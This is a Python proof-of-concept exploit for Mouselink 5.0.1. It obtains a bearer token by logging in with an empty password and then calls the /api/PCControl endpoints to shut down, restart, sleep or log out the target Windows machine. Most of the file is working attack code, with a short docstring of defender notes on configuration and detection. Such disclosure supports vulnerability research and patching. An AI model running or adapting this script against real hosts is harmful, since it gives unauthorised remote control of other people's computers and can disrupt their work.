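#!/usr/bin/env python3
# Exploit Title: Mouselink 5.0.1 - Remote System Control
# Date: 25/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mouselink.app/
# Software Link: https://blob.mouselink.app/mouselink-win-Setup.exe
# Version: 5.0.1
# Tested on: Windows 10
"""Proof of concept for unauthenticated PC control in Mouselink 5.0.1.

Description:
Mouselink 5.0.1 allows remote attackers to control system functions
(shutdown, restart, sleep, logout). By default, no password is configured,
allowing an attacker to obtain a valid JWT token and invoke privileged
/api/PCControl/* endpoints, leading to unauthorized system operations.

Notes for defenders (derived from the requests this script makes):
  * The weakness is the default configuration: with no password set,
    /api/login accepts an empty password and returns a bearer token.
    Setting a password in Mouselink removes the precondition described above.
  * Login credentials are sent as query-string parameters over plain HTTP,
    so both they and the returned token cross the network in cleartext.
    Keep the service port (11521 in this listing) off untrusted networks.
  * A useful detection is a GET to /api/login with an empty ``password``
    parameter followed by GETs to /api/PCControl/* from a host that is not
    a paired device.
"""

import argparse
import sys

import requests

# Lab target used by the original author; the script has no option to change it.
SERVER_IP = "192.168.8.105"
SERVER_PORT = 11521
BASE_URL = f"http://{SERVER_IP}:{SERVER_PORT}"

# Applied to every HTTP request so an unresponsive host cannot hang the script.
REQUEST_TIMEOUT = 5


def login_and_get_token():
    """Log in with an empty password and return the issued token.

    Sends a GET to ``/api/login`` with a fixed username and an empty password.
    The headers reproduce the ones in the original listing.

    Returns:
        The value of ``data.key`` from the JSON response when the server
        answers HTTP 200 with a truthy ``success`` field, otherwise ``None``
        (including on network errors or a malformed response body).
    """
    try:
        response = requests.get(
            f"{BASE_URL}/api/login",
            params={"username": "blue0x1", "password": ""},
            headers={
                "User-Agent": "Dart/3.5 (dart:io)",
                "Accept-Encoding": "gzip",
                "Host": f"{SERVER_IP}:{SERVER_PORT}",
            },
            timeout=REQUEST_TIMEOUT,
        )
        if response.status_code != 200:
            return None
        payload = response.json()  # parsed once and reused below
        if payload.get("success"):
            return payload["data"]["key"]
    except (requests.RequestException, ValueError, KeyError,
            TypeError, AttributeError):
        # Network failure, non-JSON body, or unexpected JSON shape: treat as
        # "no token" without swallowing KeyboardInterrupt/SystemExit the way
        # a bare ``except:`` would.
        pass
    return None


def send_pc_control_command(token, action):
    """Call ``/api/PCControl/<action>`` with the bearer token and report the result.

    Args:
        token: Token returned by ``login_and_get_token``.
        action: Endpoint name appended to ``/api/PCControl/``.

    Prints a success line when the JSON response has a truthy ``success``
    field, a failure line otherwise, and an error line when the request or
    the response parsing fails. Returns nothing.
    """
    endpoint = f"{BASE_URL}/api/PCControl/{action}"
    headers = {"Authorization": f"Bearer {token}"}
    try:
        # The original call had no timeout and could block indefinitely.
        response = requests.get(endpoint, headers=headers,
                                timeout=REQUEST_TIMEOUT)
        data = response.json()
        if data.get("success"):
            print(f"[+] {action} request sent successfully.")
        else:
            print(f"[-] {action} failed.")
    except (requests.RequestException, ValueError, AttributeError):
        print(f"[-] Error while sending {action} request.")


def main():
    """Parse the command line, obtain a token and send at most one action.

    Returns:
        Process exit status: 1 when no token could be obtained, 0 otherwise
        (including when no action flag was given).
    """
    parser = argparse.ArgumentParser(description="Mouselink Remote PC Control Exploit")
    parser.add_argument("--shutdown", action="store_true", help="Trigger system shutdown")
    parser.add_argument("--restart", action="store_true", help="Trigger system restart")
    parser.add_argument("--sleep", action="store_true", help="Put system to sleep")
    parser.add_argument("--logout", action="store_true", help="Log out current user")
    args = parser.parse_args()

    token = login_and_get_token()
    if not token:
        print("[-] Failed to obtain JWT token.")
        return 1

    # Only the first matching flag is acted on, in this fixed order.
    if args.shutdown:
        send_pc_control_command(token, "Shutdown")
    elif args.restart:
        send_pc_control_command(token, "Restart")
    elif args.sleep:
        send_pc_control_command(token, "Sleep")
    elif args.logout:
        send_pc_control_command(token, "Logout")
    else:
        print("[-] No action specified. Use --shutdown, --restart, --sleep, or --logout.")
    return 0


if __name__ == "__main__":
    # sys.exit instead of the site-provided exit(), which is not guaranteed
    # to exist (for example under ``python -S``).
    sys.exit(main())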